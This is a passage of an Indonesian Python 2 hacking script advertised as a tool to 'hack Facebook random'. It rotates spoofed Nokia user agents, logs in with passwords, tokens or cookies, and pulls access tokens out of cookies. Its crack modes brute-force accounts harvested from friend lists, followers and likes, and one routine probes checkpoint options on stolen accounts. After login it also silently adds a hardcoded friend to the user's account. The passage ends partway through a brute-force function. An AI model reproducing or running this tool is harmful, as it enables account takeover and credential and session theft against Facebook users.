"Mozilla/5.0 (Series40; Nokia208/10.34; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia2700c-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-03/23.0.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia301.1/08.02; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia305/07.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE72-1/091.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.34 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia207.1/10.24; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia2052/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.34", "Mozilla/5.0 (Series40; Nokia307/07.55; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; NokiaX3-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Linux; Android 4.1.2; GT-P3110; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia208.4/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45. browser: Nokia Browser OS40", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC3-01/07.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (series40; NokiaX2-02/10.90;Profile/MIDP-2.1 configuration/CLD-1.1) gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Symbian/3; Android 2.3.5; Nokia808PureView/113.010.1508; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.2.21 Mobile Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Mozilla/5.0 (Series30Plus; Nokia225/20.10.11; Profile/Series30Plus Configuration/Series30Plus) Gecko/20100401 S40OviBrowser/3.8.1.2.06", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia305/07.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia515/07.01; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia208/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series30Plus; Nokia225/20.10.11; Profile/Series30Plus Configuration/Series30Plus) Gecko/20100401 S40OviBrowser/3.8.1.2.0612", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia2700-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45"])
my_date = date.today()
hr = calendar.day_name[my_date.weekday()]
tanggal = ("%s-%s-%s-%s"%(hr, ha, op, ta))
tgl = ("%s %s %s"%(ha, op, ta))
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "August", "09": "September", "10": "October", "11": "November", "12": "December"}
reload(sys)
sys.setdefaultencoding("utf-8")
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent',"NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+")]
banner = ("""\033[1;37m
______\033[1;91m __ __ \033[1;37m __
/ ____/ \033[1;91m / // / \033[1;37m _____ / /__
/ / \033[1;91m/ // /_ \033[1;37m / ___/ / //_/
/ /___ \033[1;91m/__ __/\033[1;37m / /__ / ,< Au \033[1;36m• \033[1;32mDekura-X.\033[1;37m
\____/ \033[1;91m /_/ \033[1;37m \___/ /_/|_|\n
\033[1;33m•\033[1;91m•\033[1;37m New Tools Hack Facebook Random \033[1;33m•\033[1;91m•\033[1;37m
\033[1;33m•\033[1;91m•\033[1;37m Gunakan Akun Tumbal Untuk Login! \033[1;33m•\033[1;91m•\033[1;37m""")
logo = """\033[1;37m
______\033[1;91m __ __ \033[1;37m __
/ ____/ \033[1;91m / // / \033[1;37m _____ / /__
/ / \033[1;91m/ // /_ \033[1;37m / ___/ / //_/
/ /___ \033[1;91m/__ __/\033[1;37m / /__ / ,< Au \033[1;36m• \033[1;32mDekura-X.\033[1;37m
\____/ \033[1;91m /_/ \033[1;37m \___/ /_/|_|\n"""
host="https://mbasic.facebook.com"
ips=None
try:
ipne=requests.get("https://api.ipify.org").text.strip()
ips=requests.get("https://ipapi.com/ip_api.php?ip="+ipne,headers={"Referer":"https://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"}).json()["country_name"].lower()
except:
ips=None
def clear():
if " linux" in sys.platform.lower():
os.system("clear")
elif "win" in sys.platform.lower():
os.system("cls")
else:os.system("clear")
### Menu Login ###
def login():
os.system('clear')
print banner
print("\033[0;96m"+50*"-")
print ' \x1b[0;97m[\x1b[0;96m1\x1b[0;97m] Login With Email & Pass (\033[1;36mRawan CheckPoint\033[1;37m)'
print ' \x1b[0;97m[\x1b[0;96m2\x1b[0;97m] Login With Token Facebook (\033[1;36mRecommended\033[1;37m)'
print ' \x1b[0;97m[\x1b[0;96m3\x1b[0;97m] Login With Cookie Facebook (\033[1;36mRecommended\033[1;37m)'
print ' \x1b[0;97m[\x1b[0;96m4\x1b[0;97m] Check Video Cara Ambil Token/Cookie fb '
print ' \x1b[0;97m[\x1b[0;96m0\x1b[0;97m] Exite Programs'
sek = raw_input('\n \x1b[0;97m[\x1b[0;96m•\x1b[0;97m] Choose : ')
if sek=="":
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
elif sek=="1":
rawancp()
elif sek=="2":
log_token()
elif sek=="3":
cookie()
elif sek=="4":
alltutor()
elif sek=="0":
exit()
else:
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
### Login Email&Pass ###
def rawancp():
try:
toket = open('___dekura___sayang___ara___','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
id = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Email/No: ')
pwd = getpass.getpass("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Akun: ")
jalan("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Sedang Login...")
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No connection"
os.sys.exit()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("___dekura___sayang___ara___", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Berhasil Login'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
except requests.exceptions.ConnectionError:
print"\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No connection"
os.sys.exit()
if 'checkpoint' in url:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Akun Anda Terkena Checkpoint")
os.system('rm -rf ___dekura___sayang___ara___')
os.sys.exit()
else:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Login Gagal")
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(2)
login()
### Login Token ###
def log_token():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
data = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token: ")
try:
me = requests.get('https://graph.facebook.com/me?access_token='+data)
open("___dekura___sayang___ara___",'w').write(data)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Login Success").format(G,N)
jalan("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Please Subscribe My Channel:)")
os.system('xdg-open https://youtube.com/c/orbXDBdbsS')
exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
except KeyError:
print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Invalid Token").format(R,N)
time.sleep(1.0)
raw_input("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Lihat Cara Ambil Token Y/y? ")
kontolrecode()
login()
### Login cookie ###
def cookie():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
cookie = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Cookie: ")
try:
data = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = {
'user-agent' : 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36', # Jangan Di Ganti Ea Anjink.
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8'
}, cookies = {
'cookie' : cookie
})
find_token = re.search('(EAAA\w+)', data.text)
hasil = " \033[0;97m[\033[0;91m!\033[0;97m] Your Cookie Invalid" if (find_token is None) else '\n* Your fb access token : ' + find_token.group(1)
#print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Cookie Invalid")
#time.sleep(1.5)
#tutorcowlies()
except requests.exceptions.ConnectionError:
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No Connection")
cookie = open("___dekura___sayang___ara___", 'w')
cookie.write(find_token.group(1))
cookie.close()
jalan("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Please Subscribe My Channel:)")
os.system('xdg-open https://youtube.com/c/orbXDBdbsS')
exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
def convert():
global post,reac,kom
try:
token = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = {
'user-agent' : 'Mozilla/5.0 (Linux; Android 10; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.82 Mobile Safari/537.36', #B4ngsat
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8'
}, cookies = {
'cookie' : open(".cok",'r').read()
})
find_token = re.search('(EAAA\w+)', token.text)
if (find_token is None):
pass
else:
open("___dekura___sayang___ara___",'w').write(find_token.group(1))
return
except Exception as e:
print(R+"\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Error : %s"%e)
exit()
### AMBIL TOKEN ###
def kontolrecode():
os.system("clear")
print logo
print("\033[0;96m"+50*"-")
jalan(p+" ["+o+"•"+p+"] Open Youtube...")
os.system("xdg-open https://youtu.be/qhxw5BVUBlE")
raw_input(p+" [BACK]")
login()
### Ambil Cookies ###
def tutorcowlies():
os.system("clear")
print logo
print("\033[0;96m"+50*"-")
jalan(p+" ["+o+"•"+p+"] Open Youtube...")
os.system("xdg-open https://youtu.be/NxkjhemO-r0")
raw_input(p+" [BACK]")
login()
### Tutor Ambil Cookie/Token ###
def alltutor():
os.system('clear')
print banner
print("\033[0;96m"+50*"-")
print ' \x1b[0;97m[\x1b[0;96m1\x1b[0;97m] Check Tutor Cara Ambil Token Facebook '
print ' \x1b[0;97m[\x1b[0;96m2\x1b[0;97m] Check Tutor Cara Ambil Cookie Facebook '
print ' \x1b[0;97m[\x1b[0;96m3\x1b[0;97m] Back To Menu Login'
print ' \x1b[0;97m[\x1b[0;96m0\x1b[0;97m] Exite Programs'
sek = raw_input('\n \x1b[0;97m[\x1b[0;96m•\x1b[0;97m] Choose : ')
if sek=="":
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
elif sek=="1":
kontolrecode()
elif sek=="2":
tutorcowlies()
elif sek=="3":
login()
elif sek=="0":
exit()
else:
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);alltutor()
### Menu Tools ###
def menu():
try:
toket = open('___dekura___sayang___ara___','r').read()
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nama = a['first_name']
id = a['id']
except Exception as e:
print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Error : %s"%e).format(R,N)
time.sleep(1)
login()
os.system("clear")
print logo
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Your Name : \033[1;32m"+nama)
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Your ID : \033[1;32m"+id)
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Tgl Login Sc : \033[1;32m"+tanggal)
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Version : \033[1;32mElite 1.0")
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Expired : \033[1;32m-")
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Crack ID From Friendlist/Public")
print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Crack ID From Followers")
print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Crack ID From Likes")
print("\033[0;96m\033[0;97m [\033[1;36m4\033[1;37m] Crack From ID Target (\033[1;36mTergantung Hoki Kalian\033[1;37m)")
print("\033[0;96m\033[0;97m [\033[1;36m5\033[1;37m] Crack With Email ")
print("\033[0;96m\033[0;97m [\033[1;36m6\033[1;37m] Crack With Number Phone")
print("\033[0;96m\033[0;97m [\033[1;36m7\033[1;37m] Cek Result Crack")
print("\033[0;96m\033[0;97m [\033[1;36m8\033[1;37m] Cek Opsi Sesi Account Cp ")
print("\033[0;96m\033[0;97m [\033[1;36m9\033[1;37m] Setting Ua %s(%s User agent%s ) "%(p,o,p))
print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Logout")
print ""
r=raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if r=="":print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] isi Yang Benar").format(R,N);menu()
elif r=="1":
publik()
dekura_x()
elif r=="2":
followers()
dekura_x()
elif r=="3":
likes()
dekura_x()
elif r=="4":
hek_target()
elif r=="5":
exit(emailerendem.emaileclone())# Sengaja Gua Pisah Biar Gak Ngesetuck
elif r=="6":
exit(arawangy.tetearakecil())# Sengaja Gua Pisah Biar Gak Ngesetuck
elif r=="7":
ress()
elif r=="8":
syngara()
elif r=="9":
setua()
elif r=="0":
try:
#os.remove(".cok")
os.remove("___dekura___sayang___ara___")
#exit(basecookie())
except Exception as e:print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Eror file tidak ditemukan %s"%e)
else:
print ("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] SALAH ANJING!").format(R,N);menu()
### Set Ua (User agent) ###
def setua():
print("\n\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Set User agent sendiri")
print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Cek User agent sekarang")
print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Set User agent random")
print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Back")
print("")
pil_ua=raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if pil_ua == "1" or pil_ua == "01":
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan User agent dengan benar agar tidak eror!")
user=raw_input("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan Ua: ")
open("ua.txt", "w").write(user)
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Sedang mengganti User agent!")
time.sleep(1.5)
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Succes mengganti User agent!")
raw_input("\033[1;37m [BACK]")
menu()
elif pil_ua == "2" or pil_ua == "02":
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent sekarang:%s %s %s "%(h,open('ua.txt').read(),p))
raw_input("\033[1;37m [BACK]")
menu()
elif pil_ua == "3" or pil_ua == "03":
randomuaa = ahahahaha_kimochii_araaaaaa
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent sekarang:%s %s %s "%(h,open('ua.txt').read(),p))
time.sleep(1.5)
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Mohon tunggu sebentar...")
time.sleep(1.5)
open("ua.txt", "w").write(randomuaa)
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Succes mengganti User agent!")
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent:%s %s %s "%(h,open('ua.txt').read(),p))
raw_input("\033[1;37m [BACK]")
menu()
elif pil_ua == "0" or pil_ua == "00":
menu()
else:
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Pilihan Tidak Ada!")
### Check Option Sesi ###
def syngara():
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan File cp.txt")
files = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] File: ")
if files == "":
menu()
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Files %s%s%s Tidak Ada!"%(h,files,p))
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Account Cp : \033[1;32m%s\033[1;37m"%(len(buka_baju)))
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Opsi Checkpoint, Please Wait...")
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Account : "+(kontol.replace(" + ","")))
try:
aracans(titid[0].replace(" + ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Cek Account Checkpoint Selesai...")
raw_input("%s [BACK]"%(p))
menu()
def aracans(user, pasw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
ses = requests.Session()
# kntl bapackkau pecah
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
num = 0
for _ in xe:
num += 1
print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Opsi Yang Tersedia "+str(len(ngew)))
for opt in range(len(ngew)):
print(" [\033[1;36m"+str(opt+1)+"\033[1;37m] "+ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] %s"%(oh))
else:
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Login Gagal, ID/Pass Salah\n")
### BruteForce Target (Kalo Hoki) ###
def hek_target():
global toket
try:
toket=open('___dekura___sayang___ara___','r').read()
except IOError:
print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token/Cookie Invalid"
os.system('rm -rf ___dekura___sayang___ara___')
login()
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
try:
